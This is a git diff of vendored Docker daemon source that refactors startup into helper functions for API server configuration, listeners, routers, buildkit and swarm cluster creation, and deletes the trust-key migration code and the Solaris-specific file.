 	systemrouter "github.com/docker/docker/api/server/router/system"
 	"github.com/docker/docker/api/server/router/volume"
+	buildkit "github.com/docker/docker/builder/builder-next"
 	"github.com/docker/docker/builder/dockerfile"
-	cliflags "github.com/docker/docker/cli/flags"
-	"github.com/docker/docker/cliconfig"
+	"github.com/docker/docker/builder/fscache"
+	"github.com/docker/docker/cli/debug"
 	"github.com/docker/docker/daemon"
 	"github.com/docker/docker/daemon/cluster"
-	"github.com/docker/docker/daemon/logger"
+	"github.com/docker/docker/daemon/config"
+	"github.com/docker/docker/daemon/listeners"
 	"github.com/docker/docker/dockerversion"
 	"github.com/docker/docker/libcontainerd"
 	dopts "github.com/docker/docker/opts"
 	"github.com/docker/docker/pkg/authorization"
-	"github.com/docker/docker/pkg/jsonlog"
-	"github.com/docker/docker/pkg/listeners"
+	"github.com/docker/docker/pkg/jsonmessage"
 	"github.com/docker/docker/pkg/pidfile"
 	"github.com/docker/docker/pkg/plugingetter"
 	"github.com/docker/docker/pkg/signal"
 	"github.com/docker/docker/pkg/system"
+	"github.com/docker/docker/plugin"
 	"github.com/docker/docker/registry"
 	"github.com/docker/docker/runconfig"
-	"github.com/docker/docker/utils"
 	"github.com/docker/go-connections/tlsconfig"
+	swarmapi "github.com/docker/swarmkit/api"
+	"github.com/moby/buildkit/session"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 	"github.com/spf13/pflag"
 )
 
-const (
-	flagDaemonConfigFile = "config-file"
-)
-
 // DaemonCli represents the daemon CLI.
 type DaemonCli struct {
-	*daemon.Config
+	*config.Config
 	configFile *string
 	flags      *pflag.FlagSet
 
@@ -68,60 +71,14 @@ func NewDaemonCli() *DaemonCli {
 	return &DaemonCli{}
 }
 
-func migrateKey(config *daemon.Config) (err error) {
-	// No migration necessary on Windows
-	if runtime.GOOS == "windows" {
-		return nil
-	}
-
-	// Migrate trust key if exists at ~/.docker/key.json and owned by current user
-	oldPath := filepath.Join(cliconfig.ConfigDir(), cliflags.DefaultTrustKeyFile)
-	newPath := filepath.Join(getDaemonConfDir(config.Root), cliflags.DefaultTrustKeyFile)
-	if _, statErr := os.Stat(newPath); os.IsNotExist(statErr) && currentUserIsOwner(oldPath) {
-		defer func() {
-			// Ensure old path is removed if no error occurred
-			if err == nil {
-				err = os.Remove(oldPath)
-			} else {
-				logrus.Warnf("Key migration failed, key file not removed at %s", oldPath)
-				os.Remove(newPath)
-			}
-		}()
-
-		if err := system.MkdirAll(getDaemonConfDir(config.Root), os.FileMode(0644)); err != nil {
-			return fmt.Errorf("Unable to create daemon configuration directory: %s", err)
-		}
-
-		newFile, err := os.OpenFile(newPath, os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0600)
-		if err != nil {
-			return fmt.Errorf("error creating key file %q: %s", newPath, err)
-		}
-		defer newFile.Close()
-
-		oldFile, err := os.Open(oldPath)
-		if err != nil {
-			return fmt.Errorf("error opening key file %q: %s", oldPath, err)
-		}
-		defer oldFile.Close()
-
-		if _, err := io.Copy(newFile, oldFile); err != nil {
-			return fmt.Errorf("error copying key: %s", err)
-		}
-
-		logrus.Infof("Migrated key from %s to %s", oldPath, newPath)
-	}
-
-	return nil
-}
-
-func (cli *DaemonCli) start(opts daemonOptions) (err error) {
+func (cli *DaemonCli) start(opts *daemonOptions) (err error) {
 	stopc := make(chan bool)
 	defer close(stopc)
 
 	// warn from uuid package when running the daemon
 	uuid.Loggerf = logrus.Warnf
 
-	opts.common.SetDefaultOptions(opts.flags)
+	opts.SetDefaultOptions(opts.flags)
 
 	if cli.Config, err = loadDaemonCliConfig(opts); err != nil {
 		return err
@@ -129,14 +86,8 @@ func (cli *DaemonCli) start(opts daemonOptions) (err error) {
 	cli.configFile = &opts.configFile
 	cli.flags = opts.flags
 
-	if opts.common.TrustKey == "" {
-		opts.common.TrustKey = filepath.Join(
-			getDaemonConfDir(cli.Config.Root),
-			cliflags.DefaultTrustKeyFile)
-	}
-
 	if cli.Config.Debug {
-		utils.EnableDebug()
+		debug.Enable()
 	}
 
 	if cli.Config.Experimental {
@@ -144,20 +95,17 @@ func (cli *DaemonCli) start(opts daemonOptions) (err error) {
 	}
 
 	logrus.SetFormatter(&logrus.TextFormatter{
-		TimestampFormat: jsonlog.RFC3339NanoFixed,
+		TimestampFormat: jsonmessage.RFC3339NanoFixed,
 		DisableColors:   cli.Config.RawLogs,
+		FullTimestamp:   true,
 	})
 
+	system.InitLCOW(cli.Config.Experimental)
+
 	if err := setDefaultUmask(); err != nil {
 		return fmt.Errorf("Failed to set umask: %v", err)
 	}
 
-	if len(cli.LogConfig.Config) > 0 {
-		if err := logger.ValidateLogOpts(cli.LogConfig.Type, cli.LogConfig.Config); err != nil {
-			return fmt.Errorf("Failed to set log opts: %v", err)
-		}
-	}
-
 	// Create the daemon root before we create ANY other files (PID, or migrate keys)
 	// to ensure the appropriate ACL is set (particularly relevant on Windows)
 	if err := daemon.CreateDaemonRoot(cli.Config); err != nil {
@@ -176,95 +124,57 @@ func (cli *DaemonCli) start(opts daemonOptions) (err error) {
 		}()
 	}
 
-	serverConfig := &apiserver.Config{
-		Logging:     true,
-		SocketGroup: cli.Config.SocketGroup,
-		Version:     dockerversion.Version,
-		EnableCors:  cli.Config.EnableCors,
-		CorsHeaders: cli.Config.CorsHeaders,
-	}
-
-	if cli.Config.TLS {
-		tlsOptions := tlsconfig.Options{
-			CAFile:   cli.Config.CommonTLSOptions.CAFile,
-			CertFile: cli.Config.CommonTLSOptions.CertFile,
-			KeyFile:  cli.Config.CommonTLSOptions.KeyFile,
-		}
-
-		if cli.Config.TLSVerify {
-			// server requires and verifies client's certificate
-			tlsOptions.ClientAuth = tls.RequireAndVerifyClientCert
-		}
-		tlsConfig, err := tlsconfig.Server(tlsOptions)
-		if err != nil {
-			return err
-		}
-		serverConfig.TLSConfig = tlsConfig
-	}
-
-	if len(cli.Config.Hosts) == 0 {
-		cli.Config.Hosts = make([]string, 1)
+	serverConfig, err := newAPIServerConfig(cli)
+	if err != nil {
+		return fmt.Errorf("Failed to create API server: %v", err)
 	}
+	cli.api = apiserver.New(serverConfig)
 
-	api := apiserver.New(serverConfig)
-	cli.api = api
-
-	for i := 0; i < len(cli.Config.Hosts); i++ {
-		var err error
-		if cli.Config.Hosts[i], err = dopts.ParseHost(cli.Config.TLS, cli.Config.Hosts[i]); err != nil {
-			return fmt.Errorf("error parsing -H %s : %v", cli.Config.Hosts[i], err)
-		}
-
-		protoAddr := cli.Config.Hosts[i]
-		protoAddrParts := strings.SplitN(protoAddr, "://", 2)
-		if len(protoAddrParts) != 2 {
-			return fmt.Errorf("bad format %s, expected PROTO://ADDR", protoAddr)
-		}
-
-		proto := protoAddrParts[0]
-		addr := protoAddrParts[1]
-
-		// It's a bad idea to bind to TCP without tlsverify.
-		if proto == "tcp" && (serverConfig.TLSConfig == nil || serverConfig.TLSConfig.ClientAuth != tls.RequireAndVerifyClientCert) {
-			logrus.Warn("[!] DON'T BIND ON ANY IP ADDRESS WITHOUT setting -tlsverify IF YOU DON'T KNOW WHAT YOU'RE DOING [!]")
-		}
-		ls, err := listeners.Init(proto, addr, serverConfig.SocketGroup, serverConfig.TLSConfig)
-		if err != nil {
-			return err
-		}
-		ls = wrapListeners(proto, ls)
-		// If we're binding to a TCP port, make sure that a container doesn't try to use it.
-		if proto == "tcp" {
-			if err := allocateDaemonPort(addr); err != nil {
-				return err
-			}
-		}
-		logrus.Debugf("Listener created for HTTP on %s (%s)", proto, addr)
-		api.Accept(addr, ls...)
+	hosts, err := loadListeners(cli, serverConfig)
+	if err != nil {
+		return fmt.Errorf("Failed to load listeners: %v", err)
 	}
 
-	if err := migrateKey(cli.Config); err != nil {
+	registryService, err := registry.NewService(cli.Config.ServiceOptions)
+	if err != nil {
 		return err
 	}
 
-	// FIXME: why is this down here instead of with the other TrustKey logic above?
-	cli.TrustKeyPath = opts.common.TrustKey
-
-	registryService := registry.NewService(cli.Config.ServiceOptions)
-	containerdRemote, err := libcontainerd.New(cli.getLibcontainerdRoot(), cli.getPlatformRemoteOptions()...)
+	rOpts, err := cli.getRemoteOptions()
+	if err != nil {
+		return fmt.Errorf("Failed to generate containerd options: %v", err)
+	}
+	containerdRemote, err := libcontainerd.New(filepath.Join(cli.Config.Root, "containerd"), filepath.Join(cli.Config.ExecRoot, "containerd"), rOpts...)
 	if err != nil {
 		return err
 	}
 	signal.Trap(func() {
 		cli.stop()
 		<-stopc // wait for daemonCli.start() to return
-	})
+	}, logrus.StandardLogger())
+
+	// Notify that the API is active, but before daemon is set up.
+	preNotifySystem()
 
-	d, err := daemon.NewDaemon(cli.Config, registryService, containerdRemote)
+	pluginStore := plugin.NewStore()
+
+	if err := cli.initMiddlewares(cli.api, serverConfig, pluginStore); err != nil {
+		logrus.Fatalf("Error creating middlewares: %v", err)
+	}
+
+	d, err := daemon.NewDaemon(cli.Config, registryService, containerdRemote, pluginStore)
 	if err != nil {
 		return fmt.Errorf("Error starting daemon: %v", err)
 	}
 
+	d.StoreHosts(hosts)
+
+	// validate after NewDaemon has restored enabled plugins. Dont change order.
+	if err := validateAuthzPlugins(cli.Config.AuthorizationPlugins, pluginStore); err != nil {
+		return fmt.Errorf("Error validating authorization plugin: %v", err)
+	}
+
+	// TODO: move into startMetricsServer()
 	if cli.Config.MetricsAddress != "" {
 		if !d.HasExperimental() {
 			return fmt.Errorf("metrics-addr is only supported when experimental is enabled")
@@ -274,18 +184,9 @@ func (cli *DaemonCli) start(opts daemonOptions) (err error) {
 		}
 	}
 
-	name, _ := os.Hostname()
-
-	c, err := cluster.New(cluster.Config{
-		Root:                   cli.Config.Root,
-		Name:                   name,
-		Backend:                d,
-		NetworkSubnetsProvider: d,
-		DefaultAdvertiseAddr:   cli.Config.SwarmDefaultAdvertiseAddr,
-		RuntimeRoot:            cli.getSwarmRunRoot(),
-	})
+	c, err := createAndStartCluster(cli, d)
 	if err != nil {
-		logrus.Fatalf("Error creating cluster component: %v", err)
+		logrus.Fatalf("Error starting cluster component: %v", err)
 	}
 
 	// Restart all autostart containers which has a swarm endpoint
@@ -295,20 +196,21 @@ func (cli *DaemonCli) start(opts daemonOptions) (err error) {
 
 	logrus.Info("Daemon has completed initialization")
 
-	logrus.WithFields(logrus.Fields{
-		"version":     dockerversion.Version,
-		"commit":      dockerversion.GitCommit,
-		"graphdriver": d.GraphDriverName(),
-	}).Info("Docker daemon")
-
 	cli.d = d
 
-	// initMiddlewares needs cli.d to be populated. Dont change this init order.
-	if err := cli.initMiddlewares(api, serverConfig); err != nil {
-		logrus.Fatalf("Error creating middlewares: %v", err)
+	routerOptions, err := newRouterOptions(cli.Config, d)
+	if err != nil {
+		return err
 	}
-	d.SetCluster(c)
-	initRouter(api, d, c)
+	routerOptions.api = cli.api
+	routerOptions.cluster = c
+
+	initRouter(routerOptions)
+
+	// process cluster change notifications
+	watchCtx, cancel := context.WithCancel(context.Background())
+	defer cancel()
+	go d.ProcessClusterNotifications(watchCtx, c.GetWatchStream())
 
 	cli.setupConfigReloadTrap()
 
@@ -316,7 +218,7 @@ func (cli *DaemonCli) start(opts daemonOptions) (err error) {
 	// We need to start it as a goroutine and wait on it so
 	// daemon doesn't exit
 	serveAPIWait := make(chan error)
-	go api.Wait(serveAPIWait)
+	go cli.api.Wait(serveAPIWait)
 
 	// after the daemon is done setting up we can notify systemd api
 	notifySystem()
@@ -334,36 +236,105 @@ func (cli *DaemonCli) start(opts daemonOptions) (err error) {
 	return nil
 }
 
+type routerOptions struct {
+	sessionManager *session.Manager
+	buildBackend   *buildbackend.Backend
+	buildCache     *fscache.FSCache // legacy
+	buildkit       *buildkit.Builder
+	daemon         *daemon.Daemon
+	api            *apiserver.Server
+	cluster        *cluster.Cluster
+}
+
+func newRouterOptions(config *config.Config, daemon *daemon.Daemon) (routerOptions, error) {
+	opts := routerOptions{}
+	sm, err := session.NewManager()
+	if err != nil {
+		return opts, errors.Wrap(err, "failed to create sessionmanager")
+	}
+
+	builderStateDir := filepath.Join(config.Root, "builder")
+
+	buildCache, err := fscache.NewFSCache(fscache.Opt{
+		Backend: fscache.NewNaiveCacheBackend(builderStateDir),
+		Root:    builderStateDir,
+		GCPolicy: fscache.GCPolicy{ // TODO: expose this in config
+			MaxSize:         1024 * 1024 * 512,  // 512MB
+			MaxKeepDuration: 7 * 24 * time.Hour, // 1 week
+		},
+	})
+	if err != nil {
+		return opts, errors.Wrap(err, "failed to create fscache")
+	}
+
+	manager, err := dockerfile.NewBuildManager(daemon.BuilderBackend(), sm, buildCache, daemon.IDMappings())
+	if err != nil {
+		return opts, err
+	}
+
+	buildkit, err := buildkit.New(buildkit.Opt{
+		SessionManager: sm,
+		Root:           filepath.Join(config.Root, "buildkit"),
+		Dist:           daemon.DistributionServices(),
+	})
+	if err != nil {
+		return opts, err
+	}
+
+	bb, err := buildbackend.NewBackend(daemon.ImageService(), manager, buildCache, buildkit)
+	if err != nil {
+		return opts, errors.Wrap(err, "failed to create buildmanager")
+	}
+
+	return routerOptions{
+		sessionManager: sm,
+		buildBackend:   bb,
+		buildCache:     buildCache,
+		buildkit:       buildkit,
+		daemon:         daemon,
+	}, nil
+}
+
 func (cli *DaemonCli) reloadConfig() {
-	reload := func(config *daemon.Config) {
+	reload := func(c *config.Config) {
 
 		// Revalidate and reload the authorization plugins
-		if err := validateAuthzPlugins(config.AuthorizationPlugins, cli.d.PluginStore); err != nil {
+		if err := validateAuthzPlugins(c.AuthorizationPlugins, cli.d.PluginStore); err != nil {
 			logrus.Fatalf("Error validating authorization plugin: %v", err)
 			return
 		}
-		cli.authzMiddleware.SetPlugins(config.AuthorizationPlugins)
+		cli.authzMiddleware.SetPlugins(c.AuthorizationPlugins)
+
+		// The namespaces com.docker.*, io.docker.*, org.dockerproject.* have been documented
+		// to be reserved for Docker's internal use, but this was never enforced.  Allowing
+		// configured labels to use these namespaces are deprecated for 18.05.
+		//
+		// The following will check the usage of such labels, and report a warning for deprecation.
+		//
+		// TODO: At the next stable release, the validation should be folded into the other
+		// configuration validation functions and an error will be returned instead, and this
+		// block should be deleted.
+		if err := config.ValidateReservedNamespaceLabels(c.Labels); err != nil {
+			logrus.Warnf("Configured labels using reserved namespaces is deprecated: %s", err)
+		}
 
-		if err := cli.d.Reload(config); err != nil {
+		if err := cli.d.Reload(c); err != nil {
 			logrus.Errorf("Error reconfiguring the daemon: %v", err)
 			return
 		}
 
-		if config.IsValueSet("debug") {
-			debugEnabled := utils.IsDebugEnabled()
+		if c.IsValueSet("debug") {
+			debugEnabled := debug.IsEnabled()
 			switch {
-			case debugEnabled && !config.Debug: // disable debug
-				utils.DisableDebug()
-				cli.api.DisableProfiler()
-			case config.Debug && !debugEnabled: // enable debug
-				utils.EnableDebug()
-				cli.api.EnableProfiler()
+			case debugEnabled && !c.Debug: // disable debug
+				debug.Disable()
+			case c.Debug && !debugEnabled: // enable debug
+				debug.Enable()
 			}
-
 		}
 	}
 
-	if err := daemon.ReloadConfiguration(*cli.configFile, cli.flags, reload); err != nil {
+	if err := config.Reload(*cli.configFile, cli.flags, reload); err != nil {
 		logrus.Error(err)
 	}
 }
@@ -395,89 +366,118 @@ func shutdownDaemon(d *daemon.Daemon) {
 	}
 }
 
-func loadDaemonCliConfig(opts daemonOptions) (*daemon.Config, error) {
-	config := opts.daemonConfig
+func loadDaemonCliConfig(opts *daemonOptions) (*config.Config, error) {
+	conf := opts.daemonConfig
 	flags := opts.flags
-	config.Debug = opts.common.Debug
-	config.Hosts = opts.common.Hosts
-	config.LogLevel = opts.common.LogLevel
-	config.TLS = opts.common.TLS
-	config.TLSVerify = opts.common.TLSVerify
-	config.CommonTLSOptions = daemon.CommonTLSOptions{}
+	conf.Debug = opts.Debug
+	conf.Hosts = opts.Hosts
+	conf.LogLevel = opts.LogLevel
+	conf.TLS = opts.TLS
+	conf.TLSVerify = opts.TLSVerify
+	conf.CommonTLSOptions = config.CommonTLSOptions{}
+
+	if opts.TLSOptions != nil {
+		conf.CommonTLSOptions.CAFile = opts.TLSOptions.CAFile
+		conf.CommonTLSOptions.CertFile = opts.TLSOptions.CertFile
+		conf.CommonTLSOptions.KeyFile = opts.TLSOptions.KeyFile
+	}
 
-	if opts.common.TLSOptions != nil {
-		config.CommonTLSOptions.CAFile = opts.common.TLSOptions.CAFile
-		config.CommonTLSOptions.CertFile = opts.common.TLSOptions.CertFile
-		config.CommonTLSOptions.KeyFile = opts.common.TLSOptions.KeyFile
+	if conf.TrustKeyPath == "" {
+		conf.TrustKeyPath = filepath.Join(
+			getDaemonConfDir(conf.Root),
+			defaultTrustKeyFile)
+	}
+
+	if flags.Changed("graph") && flags.Changed("data-root") {
+		return nil, fmt.Errorf(`cannot specify both "--graph" and "--data-root" option`)
 	}
 
 	if opts.configFile != "" {
-		c, err := daemon.MergeDaemonConfigurations(config, flags, opts.configFile)
+		c, err := config.MergeDaemonConfigurations(conf, flags, opts.configFile)
 		if err != nil {
-			if flags.Changed(flagDaemonConfigFile) || !os.IsNotExist(err) {
-				return nil, fmt.Errorf("unable to configure the Docker daemon with file %s: %v\n", opts.configFile, err)
+			if flags.Changed("config-file") || !os.IsNotExist(err) {
+				return nil, fmt.Errorf("unable to configure the Docker daemon with file %s: %v", opts.configFile, err)
 			}
 		}
 		// the merged configuration can be nil if the config file didn't exist.
 		// leave the current configuration as it is if when that happens.
 		if c != nil {
-			config = c
+			conf = c
 		}
 	}
 
-	if err := daemon.ValidateConfiguration(config); err != nil {
+	if err := config.Validate(conf); err != nil {
 		return nil, err
 	}
 
-	// Labels of the docker engine used to allow multiple values associated with the same key.
-	// This is deprecated in 1.13, and, be removed after 3 release cycles.
-	// The following will check the conflict of labels, and report a warning for deprecation.
-	//
-	// TODO: After 3 release cycles (1.16) an error will be returned, and labels will be
-	// sanitized to consolidate duplicate key-value pairs (config.Labels = newLabels):
+	if runtime.GOOS != "windows" {
+		if flags.Changed("disable-legacy-registry") {
+			// TODO: Remove this error after 3 release cycles (18.03)
+			return nil, errors.New("ERROR: The '--disable-legacy-registry' flag has been removed. Interacting with legacy (v1) registries is no longer supported")
+		}
+		if !conf.V2Only {
+			// TODO: Remove this error after 3 release cycles (18.03)
+			return nil, errors.New("ERROR: The 'disable-legacy-registry' configuration option has been removed. Interacting with legacy (v1) registries is no longer supported")
+		}
+	}
+
+	if flags.Changed("graph") {
+		logrus.Warnf(`The "-g / --graph" flag is deprecated. Please use "--data-root" instead`)
+	}
+
+	// Check if duplicate label-keys with different values are found
+	newLabels, err := config.GetConflictFreeLabels(conf.Labels)
+	if err != nil {
+		return nil, err
+	}
+	// The namespaces com.docker.*, io.docker.*, org.dockerproject.* have been documented
+	// to be reserved for Docker's internal use, but this was never enforced.  Allowing
+	// configured labels to use these namespaces are deprecated for 18.05.
 	//
-	// newLabels, err := daemon.GetConflictFreeLabels(config.Labels)
-	// if err != nil {
-	//	return nil, err
-	// }
-	// config.Labels = newLabels
+	// The following will check the usage of such labels, and report a warning for deprecation.
 	//
-	if _, err := daemon.GetConflictFreeLabels(config.Labels); err != nil {
-		logrus.Warnf("Engine labels with duplicate keys and conflicting values have been deprecated: %s", err)
+	// TODO: At the next stable release, the validation should be folded into the other
+	// configuration validation functions and an error will be returned instead, and this
+	// block should be deleted.
+	if err := config.ValidateReservedNamespaceLabels(newLabels); err != nil {
+		logrus.Warnf("Configured labels using reserved namespaces is deprecated: %s", err)
 	}
+	conf.Labels = newLabels
 
 	// Regardless of whether the user sets it to true or false, if they
 	// specify TLSVerify at all then we need to turn on TLS
-	if config.IsValueSet(cliflags.FlagTLSVerify) {
-		config.TLS = true
+	if conf.IsValueSet(FlagTLSVerify) {
+		conf.TLS = true
 	}
 
 	// ensure that the log level is the one set after merging configurations
-	cliflags.SetLogLevel(config.LogLevel)
+	setLogLevel(conf.LogLevel)
 
-	return config, nil
+	return conf, nil
 }
 
-func initRouter(s *apiserver.Server, d *daemon.Daemon, c *cluster.Cluster) {
+func initRouter(opts routerOptions) {
 	decoder := runconfig.ContainerDecoder{}
 
 	routers := []router.Router{
 		// we need to add the checkpoint router before the container router or the DELETE gets masked
-		checkpointrouter.NewRouter(d, decoder),
-		container.NewRouter(d, decoder),
-		image.NewRouter(d, decoder),
-		systemrouter.NewRouter(d, c),
-		volume.NewRouter(d),
-		build.NewRouter(dockerfile.NewBuildManager(d)),
-		swarmrouter.NewRouter(c),
-		pluginrouter.NewRouter(d.PluginManager()),
+		checkpointrouter.NewRouter(opts.daemon, decoder),
+		container.NewRouter(opts.daemon, decoder),
+		image.NewRouter(opts.daemon.ImageService()),
+		systemrouter.NewRouter(opts.daemon, opts.cluster, opts.buildCache, opts.buildkit),
+		volume.NewRouter(opts.daemon.VolumesService()),
+		build.NewRouter(opts.buildBackend, opts.daemon),
+		sessionrouter.NewRouter(opts.sessionManager),
+		swarmrouter.NewRouter(opts.cluster),
+		pluginrouter.NewRouter(opts.daemon.PluginManager()),
+		distributionrouter.NewRouter(opts.daemon.ImageService()),
 	}
 
-	if d.NetworkControllerEnabled() {
-		routers = append(routers, network.NewRouter(d, c))
+	if opts.daemon.NetworkControllerEnabled() {
+		routers = append(routers, network.NewRouter(opts.daemon, opts.cluster))
 	}
 
-	if d.HasExperimental() {
+	if opts.daemon.HasExperimental() {
 		for _, r := range routers {
 			for _, route := range r.Routes() {
 				if experimental, ok := route.(router.ExperimentalRoute); ok {
@@ -487,36 +487,150 @@ func initRouter(s *apiserver.Server, d *daemon.Daemon, c *cluster.Cluster) {
 		}
 	}
 
-	s.InitRouter(utils.IsDebugEnabled(), routers...)
+	opts.api.InitRouter(routers...)
 }
 
-func (cli *DaemonCli) initMiddlewares(s *apiserver.Server, cfg *apiserver.Config) error {
+// TODO: remove this from cli and return the authzMiddleware
+func (cli *DaemonCli) initMiddlewares(s *apiserver.Server, cfg *apiserver.Config, pluginStore plugingetter.PluginGetter) error {
 	v := cfg.Version
 
-	exp := middleware.NewExperimentalMiddleware(cli.d.HasExperimental())
+	exp := middleware.NewExperimentalMiddleware(cli.Config.Experimental)
 	s.UseMiddleware(exp)
 
 	vm := middleware.NewVersionMiddleware(v, api.DefaultVersion, api.MinVersion)
 	s.UseMiddleware(vm)
 
-	if cfg.EnableCors {
+	if cfg.CorsHeaders != "" {
 		c := middleware.NewCORSMiddleware(cfg.CorsHeaders)
 		s.UseMiddleware(c)
 	}
 
-	if err := validateAuthzPlugins(cli.Config.AuthorizationPlugins, cli.d.PluginStore); err != nil {
-		return fmt.Errorf("Error validating authorization plugin: %v", err)
-	}
-	cli.authzMiddleware = authorization.NewMiddleware(cli.Config.AuthorizationPlugins, cli.d.PluginStore)
+	cli.authzMiddleware = authorization.NewMiddleware(cli.Config.AuthorizationPlugins, pluginStore)
+	cli.Config.AuthzMiddleware = cli.authzMiddleware
 	s.UseMiddleware(cli.authzMiddleware)
 	return nil
 }
 
+func (cli *DaemonCli) getRemoteOptions() ([]libcontainerd.RemoteOption, error) {
+	opts := []libcontainerd.RemoteOption{}
+
+	pOpts, err := cli.getPlatformRemoteOptions()
+	if err != nil {
+		return nil, err
+	}
+	opts = append(opts, pOpts...)
+	return opts, nil
+}
+
+func newAPIServerConfig(cli *DaemonCli) (*apiserver.Config, error) {
+	serverConfig := &apiserver.Config{
+		Logging:     true,
+		SocketGroup: cli.Config.SocketGroup,
+		Version:     dockerversion.Version,
+		CorsHeaders: cli.Config.CorsHeaders,
+	}
+
+	if cli.Config.TLS {
+		tlsOptions := tlsconfig.Options{
+			CAFile:             cli.Config.CommonTLSOptions.CAFile,
+			CertFile:           cli.Config.CommonTLSOptions.CertFile,
+			KeyFile:            cli.Config.CommonTLSOptions.KeyFile,
+			ExclusiveRootPools: true,
+		}
+
+		if cli.Config.TLSVerify {
+			// server requires and verifies client's certificate
+			tlsOptions.ClientAuth = tls.RequireAndVerifyClientCert
+		}
+		tlsConfig, err := tlsconfig.Server(tlsOptions)
+		if err != nil {
+			return nil, err
+		}
+		serverConfig.TLSConfig = tlsConfig
+	}
+
+	if len(cli.Config.Hosts) == 0 {
+		cli.Config.Hosts = make([]string, 1)
+	}
+
+	return serverConfig, nil
+}
+
+func loadListeners(cli *DaemonCli, serverConfig *apiserver.Config) ([]string, error) {
+	var hosts []string
+	for i := 0; i < len(cli.Config.Hosts); i++ {
+		var err error
+		if cli.Config.Hosts[i], err = dopts.ParseHost(cli.Config.TLS, cli.Config.Hosts[i]); err != nil {
+			return nil, fmt.Errorf("error parsing -H %s : %v", cli.Config.Hosts[i], err)
+		}
+
+		protoAddr := cli.Config.Hosts[i]
+		protoAddrParts := strings.SplitN(protoAddr, "://", 2)
+		if len(protoAddrParts) != 2 {
+			return nil, fmt.Errorf("bad format %s, expected PROTO://ADDR", protoAddr)
+		}
+
+		proto := protoAddrParts[0]
+		addr := protoAddrParts[1]
+
+		// It's a bad idea to bind to TCP without tlsverify.
+		if proto == "tcp" && (serverConfig.TLSConfig == nil || serverConfig.TLSConfig.ClientAuth != tls.RequireAndVerifyClientCert) {
+			logrus.Warn("[!] DON'T BIND ON ANY IP ADDRESS WITHOUT setting --tlsverify IF YOU DON'T KNOW WHAT YOU'RE DOING [!]")
+		}
+		ls, err := listeners.Init(proto, addr, serverConfig.SocketGroup, serverConfig.TLSConfig)
+		if err != nil {
+			return nil, err
+		}
+		ls = wrapListeners(proto, ls)
+		// If we're binding to a TCP port, make sure that a container doesn't try to use it.
+		if proto == "tcp" {
+			if err := allocateDaemonPort(addr); err != nil {
+				return nil, err
+			}
+		}
+		logrus.Debugf("Listener created for HTTP on %s (%s)", proto, addr)
+		hosts = append(hosts, protoAddrParts[1])
+		cli.api.Accept(addr, ls...)
+	}
+
+	return hosts, nil
+}
+
+func createAndStartCluster(cli *DaemonCli, d *daemon.Daemon) (*cluster.Cluster, error) {
+	name, _ := os.Hostname()
+
+	// Use a buffered channel to pass changes from store watch API to daemon
+	// A buffer allows store watch API and daemon processing to not wait for each other
+	watchStream := make(chan *swarmapi.WatchMessage, 32)
+
+	c, err := cluster.New(cluster.Config{
+		Root:                   cli.Config.Root,
+		Name:                   name,
+		Backend:                d,
+		VolumeBackend:          d.VolumesService(),
+		ImageBackend:           d.ImageService(),
+		PluginBackend:          d.PluginManager(),
+		NetworkSubnetsProvider: d,
+		DefaultAdvertiseAddr:   cli.Config.SwarmDefaultAdvertiseAddr,
+		RaftHeartbeatTick:      cli.Config.SwarmRaftHeartbeatTick,
+		RaftElectionTick:       cli.Config.SwarmRaftElectionTick,
+		RuntimeRoot:            cli.getSwarmRunRoot(),
+		WatchStream:            watchStream,
+	})
+	if err != nil {
+		return nil, err
+	}
+	d.SetCluster(c)
+	err = c.Start()
+
+	return c, err
+}
+
 // validates that the plugins requested with the --authorization-plugin flag are valid AuthzDriver
 // plugins present on the host and available to the daemon
 func validateAuthzPlugins(requestedPlugins []string, pg plugingetter.PluginGetter) error {
 	for _, reqPlugin := range requestedPlugins {
-		if _, err := pg.Get(reqPlugin, authorization.AuthZApiImplements, plugingetter.LOOKUP); err != nil {
+		if _, err := pg.Get(reqPlugin, authorization.AuthZApiImplements, plugingetter.Lookup); err != nil {
 			return err
 		}
 	}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_freebsd.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_freebsd.go
index 623aaf4b09..6d013b8103 100644
--- a/vendor/github.com/docker/docker/cmd/dockerd/daemon_freebsd.go
+++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_freebsd.go
@@ -1,5 +1,9 @@
 package main
 
+// preNotifySystem sends a message to the host when the API is active, but before the daemon is
+func preNotifySystem() {
+}
+
 // notifySystem sends a message to the host when the server is ready to be used
 func notifySystem() {
 }
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_linux.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_linux.go
index a556daa187..cf2d65275f 100644
--- a/vendor/github.com/docker/docker/cmd/dockerd/daemon_linux.go
+++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_linux.go
@@ -1,11 +1,13 @@
-// +build linux
-
 package main
 
 import systemdDaemon "github.com/coreos/go-systemd/daemon"
 
+// preNotifySystem sends a message to the host when the API is active, but before the daemon is
+func preNotifySystem() {
+}
+
 // notifySystem sends a message to the host when the server is ready to be used
 func notifySystem() {
 	// Tell the init daemon we are accepting requests
-	go systemdDaemon.SdNotify("READY=1")
+	go systemdDaemon.SdNotify(false, systemdDaemon.SdNotifyReady)
 }
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_solaris.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_solaris.go
deleted file mode 100644
index 974ba16345..0000000000
--- a/vendor/github.com/docker/docker/cmd/dockerd/daemon_solaris.go
+++ /dev/null
@@ -1,85 +0,0 @@
-// +build solaris
-
-package main
-
-import (
-	"fmt"
-	"net"
-	"os"
-	"path/filepath"
-	"syscall"
-
-	"github.com/docker/docker/libcontainerd"
-	"github.com/docker/docker/pkg/system"
-)
-
-const defaultDaemonConfigFile = ""
-
-// currentUserIsOwner checks whether the current user is the owner of the given
-// file.
-func currentUserIsOwner(f string) bool {
-	if fileInfo, err := system.Stat(f); err == nil && fileInfo != nil {
-		if int(fileInfo.UID()) == os.Getuid() {
-			return true
-		}
-	}
-	return false
-}
-
-// setDefaultUmask sets the umask to 0022 to avoid problems
-// caused by custom umask
-func setDefaultUmask() error {
-	desiredUmask := 0022
-	syscall.Umask(desiredUmask)
-	if umask := syscall.Umask(desiredUmask); umask != desiredUmask {
-		return fmt.Errorf("failed to set umask: expected %#o, got %#o", desiredUmask, umask)
-	}
-
-	return nil
-}
-
-func getDaemonConfDir(_ string) string {
-	return "/etc/docker"
-}
-
